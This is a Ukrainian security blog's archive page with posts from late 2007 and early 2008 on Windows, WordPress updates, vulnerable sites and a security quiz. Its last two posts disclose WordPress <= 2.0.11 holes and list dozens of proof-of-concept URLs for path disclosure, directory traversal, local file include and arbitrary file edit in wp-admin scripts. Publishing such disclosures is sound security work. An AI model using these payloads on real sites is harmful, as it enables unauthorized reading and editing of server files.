Архів для категорії 'Новини сайту'

Реклама Windows 1.0

22:47 17.01.2008

Пропоную вам подивитися цікавий і веселий відеоролик про рекламу першої версії ОС Windows. В цьому рекламному ролику Стів Балмер розповідає про переваги Вінди ;-) .

Microsoft - Реклама Windows 1.0

Майже хвилина реклами Microsoft Windows - і ні слова про безпеку. За весь ролик Балмер, описуючи переваги Віндовса, жодного слова не сказав про безпеку. Майкрософт тоді навіть не думала про неї. Ось звідки йдуть всі сьогоднішні проблеми з дірявою Віндою, IE та іншими несекюрними продуктами даної компанії. Що в свою чергу призвело до вірусних епідемій, бот-мереж, спаму, DDoS та інших негативних проявів, з якими ми стикаємося сьогодні. Про безпеку потрібно думати починаючи з першої версії свого додатку.

Безпека сайтів про безпеку 7

18:22 15.01.2008

09.12.2007

Продовжу тему безпеки секюріті сайтів, яку я піднімав в попередніх записах Безпека сайтів про безпеку, 2, 3, 4, 5 та 6.

Ось нова добірка уразливих сайтів про інформаційну безпеку:

Всім security сайтам та компаніям слід приділяти більше уваги власній безпеці.

15.01.2008

Ще одна добірка уразливих секюріті сайтів:

Секюріті та хакерським проектам варто більше слідкувати за безпекою власних сайтів.

Інтерв’ю журналу InternetUA

21:35 14.01.2008

В грудні я дав інтерв’ю журналу InternetUA. І в січневому номері журналу (що вже вийшов) буде розміщений опис моєї персони в розділі profile, зроблений на основі інтерв’ю.

Так що кому буде цікаво прочитати інформацію про мене, то можете дістати собі номер InternetUA за січень 2008 8-) . І цікаву інформацію про Інтернет та Уанет почитаєте, і про мене більше дізнаєтесь.

P.S.

Розмістив мій профайл на сайті: MustLive-InternetUA.pdf.

Небезпечний сайт Партії регіонів

22:42 10.01.2008

Нещодавно виявився цікавий факт - один з сайтів Партії регіонів є небезпечним :-) . З недавніх пір Гугл визначив, що Офіційний сайт Донецького областного вітділення Партії регіонів є небезпечним. Про що в останні дні писали різні онлайн ЗМІ.

Щоб побачити це на власні очі потрібно було лише зробити пошук даного сайта, наприклад по його домену: www.pr.dn.ua. Де Гугл видавав “Ця сторінка може заподіяти шкоду вашому комп’ютерові”. Зараз ця обставина вже виправлена і Гугл нормально видає даний сайт в серпі (хоча ще вчора він визначався як небезпечний). Регіонали звернулися до суппорту пошуковця і вони швидко виправили дану ситуацію.

Виникає запитання: чи насправді сайт www.pr.dn.ua був небезпечний, чи це була лише помилка, бо просто так подібні статуси для сайтів на виставляють. Враховуючи те, що перед встановленням статусу небезпечного, сайт повинен був ретельно перевірятися модераторами, то можна допустити, що сайт все ж таки був небезпечний (що пізніше було виправлено).

Для того щоб отримати подібний статус, потрібно щоб на сайті був виявлений небезпечний контент. Котрий і був виявлений на сайті регіоналів, після чого він отримав статус небезпечного. В даному випадку слід визначити, яким чином зловмисний контент потрапив на сайт. Серед шляхів потрапляння подібного контенту на сайт можна виділити наступні:

1. Контент розмістили навмисно. Він міг бути “небезпечним”, “не дуже небезпечним” або навіть “майже не небезпечним”, але Гугл оцінив його як небезпечний для відвідувачів.

2. Контент розмістили не навмисно. Випадково нехороший файл чи скрипт потрапив на сайт (надавати його в відкритий доступ ніхто не хотів), потім його прибрали, але Гугл вже його примітив і оцінив сайт відповідним чином.

3. Сайт похакали і розмістили небезпечний контент. Що найбільш вірогідно.

Щоб з вашим сайтом (і взагалі з будь-яким сайтом) не трапилось подібного, щоб на сайті не розмістили шкідливий контент і його не “відмітили” в пошуковці, потрібно слідкувати за його безпекою. І проводити аудит безпеки сайта. Тільки дбаючи про безпеку свого сайта ви можете бути впевнені в його долі.

Експлоіти для PHP №12

22:25 07.01.2008

Продовжуючи тему експлоітів для PHP, пропоную вам наступну добірку.

Цього разу есплоіти та уразливості в COM функціях в PHP 5.x, в функції zend_hash_init та функції libxmlrpc в PHP < 4.4.7 і 5.x < 5.2.2.

Вийшов WordPress 2.3.2

21:39 06.01.2008

Наприкінці грудня, 29.12.2007, вийшла нова версія WordPress 2.3.2 - оновлення для гілки WP 2.3.x.

WordPress 2.3.2 це багфікс та секюріті випуск для 2.3 серії. В даній версії було виправлено багато багів та уразливостей, в тому числі серйозних уразливостей, про які я писав в грудні.

Зазначу, що в офіційному пості на сайті зазначені не всі виправлення, а лише частина - про деякі виправлення зумисно не було повідомлено в пості. Про них можна дізнатися лише подивившися детальну інформацію про зміни в файлах. На сторінці Trac з переліком виправлень також наведені не всі виправлення (зокрема не всі секюріти фікси).

Офіційно розробники WP повідомили, що в WordPress 2.3.2 виправлений баг з витоком інформації про чорнетки, а також пофіксені Information disclosure уразливості (виявлені мною), та були виправлені витоки інформації в XML-RPC та APP реалізаціях. В якості бонуса, в версії 2.3.2 була додана можливість задавати власну сторінку з повідомленнями про помилки в БД.

Як наводиться в Trac були виправлені наступні баги та уразливості:

  • Покращена швидкодія роботи системи (оптимізовані функції sanitize_post та sanitize_post_field)
  • По замовчуванню не виводяться повідомлення про помилки в БД (поки не встановлено WP_DEBUG в true). Нарешті вони зробили те, про що я просив їх ще в жовтні 2006, коли знайшов перші SQL DB Structure Extraction в WP
  • Власна DB Error Page
  • Обмежений витік інформації в XML-RPC
  • Виправлена дірка в query.php, що приводила до витоку інформації про чорнетки
  • Скрипти setup-config.php та install.php тепер перевіряють на коректний зв’язок з MySQL

Але це не вся інформація про секюріти виправлення в WP 2.3.2. Як повідомив Peter Westwood в своєму пості WordPress 2.3.2 in detail, в даній версії було зроблено набагато більше виправлень (ніж повідомлено в офіційному пості).

Він навів 12 найбільш важливих виправлень. Окрім вище наведених (в Trac) 6 виправлень, також відзначу наступні:

  • Введені різні правила для різних типів URI
  • Виправлена XSS уразливість в wp-mail.php
  • Обмежений витік інформації в xmlrpc методі wp.getAuthors
  • Додані додаткові перевірки в методах xmlrpc
  • Додані додаткові перевірки в APP сервері
  • Виправлена функція validate_file() для протидії Directory traversal (на Windows) - про численні Local file include, Directory traversal та інші уразливості (що були виправлені в даній версії) я писав раніше

Зазначу, що хоча в цій версії виправленні численні Directory traversal та Local file include та Information disclosure уразливості (знайдені мною), а також відключене по дефолту виведення помилок роботи з БД (що я пропонував їм зробити ще в 2006 році), розробники жодного разу не згадали про мою допомогу, що є дуже нечемно. Більш того, вони не відповіли на більшість з моїх останніх листів і не подякували мені, лише тихенько виправили дірки (і навіть не про всі з них згадали в офіційному пості), що дуже несерйозно з їхнього боку.

Також зазначу, що дані уразливості, про котрі я писав в грудні, виправлені лише в версії WP 2.3.2 (тобто в гілці 2.3.x). Всі попередні версії, зокрема гілки 2.0.x, 2.1.x та 2.2.x (в тому числі останні версії в цих гілках) є вразливими.

Тестування з веб безпеки

19:07 05.01.2008

Оновив сьогодні тестування з веб безпеки, в якому ви можете перевірити рівень своїх знань з веб безпеки. Тест базуєтья на моїй системі тестування FlashTestSystem.

В оновленій версії додав 10 нових запитань, цього разу по п’ятому розділу мого Посібника з безпеки. Тепер у тесті 30 запитань на web security тематику (котрі базуються на перших п’яти розділах мого посібника).

Вдалого тестування ;-) .

З Новим Роком!

23:51 31.12.2007

Поздоровляю усіх вас з Новим Роком!

Бажаю в наступному 2008 році більше безпеки вам і вашим сайтам.

В якості подарунку на вас чекає святкова уразливість ;-) . А також уразливості в WordPress, що були оприлюднені мною в День багів в WordPress.

Веселих свят! :cool:

Local file include, Directory traversal та Full path disclosure в WordPress

23:43 30.12.2007

Продовжу оприлюднювати численні уразливості в WP в День багів в WordPress. Про деякі подібні уразливості я писав раніше.

В грудні, 22.12.2007, я знайшов Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах index.php, link-manager.php, link-add.php, link-categories.php, link-import.php, theme-editor.php, plugins.php, plugin-editor.php, profile.php, users.php, options-general.php, options-writing.php, options-reading.php, options-discussion.php, options-permalink.php, options-misc.php, import.php, admin.php, bookmarklet.php, cat-js.php, inline-uploading.php, options.php, profile-update.php, sidebar.php, user-edit.php (в параметрі page), а також в файлах admin-footer.php, admin-functions.php, edit-form.php, edit-form-advanced.php, edit-form-comment.php, edit-link-form.php, edit-page-form.php, menu.php, menu-header.php, blogger.php, dotclear.php, greymatter.php, livejournal.php, mt.php, rss.php, textpattern.php.

Full path disclosure:

http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows).

Local file include та Directory traversal:

http://site/wp-admin/index.php?page=\..\..\file.php
http://site/wp-admin/index.php?page=\..\..\.htaccess
http://site/wp-admin/link-manager.php?page=\..\..\.htaccess
http://site/wp-admin/link-add.php?page=\..\..\.htaccess
http://site/wp-admin/link-categories.php?page=\..\..\.htaccess
http://site/wp-admin/link-import.php?page=\..\..\.htaccess
http://site/wp-admin/theme-editor.php?page=\..\..\.htaccess
http://site/wp-admin/plugin-editor.php?page=\..\..\.htaccess
http://site/wp-admin/profile.php?page=\..\..\.htaccess
http://site/wp-admin/users.php?page=\..\..\.htaccess
http://site/wp-admin/options-general.php?page=\..\..\.htaccess
http://site/wp-admin/options-writing.php?page=\..\..\.htaccess
http://site/wp-admin/options-reading.php?page=\..\..\.htaccess
http://site/wp-admin/options-discussion.php?page=\..\..\.htaccess
http://site/wp-admin/options-permalink.php?page=\..\..\.htaccess
http://site/wp-admin/options-misc.php?page=\..\..\.htaccess
http://site/wp-admin/import.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/bookmarklet.php?page=\..\..\.htaccess
http://site/wp-admin/cat-js.php?page=\..\..\.htaccess
http://site/wp-admin/inline-uploading.php?page=\..\..\.htaccess
http://site/wp-admin/options.php?page=\..\..\.htaccess
http://site/wp-admin/profile-update.php?page=\..\..\.htaccess
http://site/wp-admin/sidebar.php?page=\..\..\.htaccess
http://site/wp-admin/user-edit.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

Arbitrary file edit, Local file include, Directory traversal та Full path disclosure в WordPress

22:52 30.12.2007

Сьогодні, в День багів в WordPress, я оприлюднюю численні уразливості в WP. Про деякі подібні уразливості я писав раніше.

В грудні, 02.12.2007 (в templates.php) і 22.12.2007, я знайшов Arbitrary file edit, Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлі templates.php (в параметрах file та page) та файлах edit-pages.php, categories.php, edit-comments.php, moderation.php, post.php та page-new.php (в параметрі page).

Full path disclosure:

http://site/wp-admin/templates.php?file= (працює тільки в WP 2.0.11)
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows).

Arbitrary file edit:

http://site/wp-admin/templates.php?file=\..\..\file

Local file include та Directory traversal:

http://site/wp-admin/templates.php?page=\..\..\file.php
http://site/wp-admin/templates.php?page=\..\..\.htaccess
http://site/wp-admin/edit-pages.php?page=\..\..\.htaccess
http://site/wp-admin/categories.php?page=\..\..\.htaccess
http://site/wp-admin/edit-comments.php?page=\..\..\.htaccess
http://site/wp-admin/moderation.php?page=\..\..\.htaccess
http://site/wp-admin/post.php?page=\..\..\.htaccess
http://site/wp-admin/page-new.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).